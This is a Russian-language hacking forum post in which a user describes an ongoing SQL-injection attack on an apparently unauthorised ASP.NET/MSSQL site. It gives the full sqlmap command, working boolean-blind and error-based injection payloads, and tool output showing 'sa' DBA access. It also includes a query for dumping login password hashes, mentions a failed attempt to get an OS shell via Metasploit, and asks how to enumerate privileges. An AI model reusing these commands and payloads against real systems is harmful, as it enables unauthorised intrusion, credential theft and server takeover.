Старый 26.05.2019, 20:51   #1
hackworld
 
Регистрация: 12.09.2018
Сообщений: 3
Репутация: 0
По умолчанию mssql

Добрый день прошу совета может кто сталкивался

Есть рес в sqlmap добрался до хешей рассшифровал пробовал лить шелл через метасплоит но выдает unable to prompt for an out-of-band session bug report

sqlmap -u "http://******/" --data="password=g00dPa%24%24w0rD&username=" -p username --os-pwn --msf-path C:\PentestBox\bin\metasploit-framework -v 1

Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: password=g00dPa$$w0rD&username=-5537' OR 9211=9211-- VoeH

Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)
Payload: password=g00dPa$$w0rD&username=-5326' OR 1910 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(113)+ (SELECT (CASE WHEN (1910=1910) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(120)+CHAR (113)))-- fjCa
---
[19:51:53] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 10 or 2016
web application technology: ASP.NET, Microsoft IIS 10.0, ASP
back-end DBMS: Microsoft SQL Server 2012
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1
[19:51:56] [CRITICAL] unable to prompt for an out-of-band session

banner:
---
Microsoft SQL Server 2014 (SP2-GDR) (KB4019093) - 12.0.5207.0 (X64)
Jul 3 2017 02:25:44
Copyright (c) Microsoft Corporation
Standard Edition (64-bit) on Windows NT 6.3 <X64> (Build 9600: ) (Hypervisor)

current user: 'sa'
current database: 'PW_PROD'
current user is DBA: True

На mysql знаю команда --users --passwords --privileges выводит юзеров,пароль и привилегии

в mssql вывел юзеров и пароли такой командой

select name,master.sys.fn_sqlvarbasetostr(password_hash) from master.sys.sql_logins

--is-dba пишет True

команда --privileges выводит просто всех юзеров

database management system users privileges:[*] ##MS_AgentSigningCertificate##[*] ##MS_PolicyEventProcessingLogin##[*] ##MS_PolicySigningCertificate##[*] ##MS_PolicyTsqlExecutionLogin##[*] ##MS_SmoExtendedSigningCertificate##[*] ##MS_SQLAuthenticatorCertificate##[*] ##MS_SQLReplicationSigningCertificate##[*] ##MS_SQLResourceSigningCertificate##[*] bwuser[*] sa (administrator)

как посмотреть какие конкретные привилегии есть у юзеров?
hackworld вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot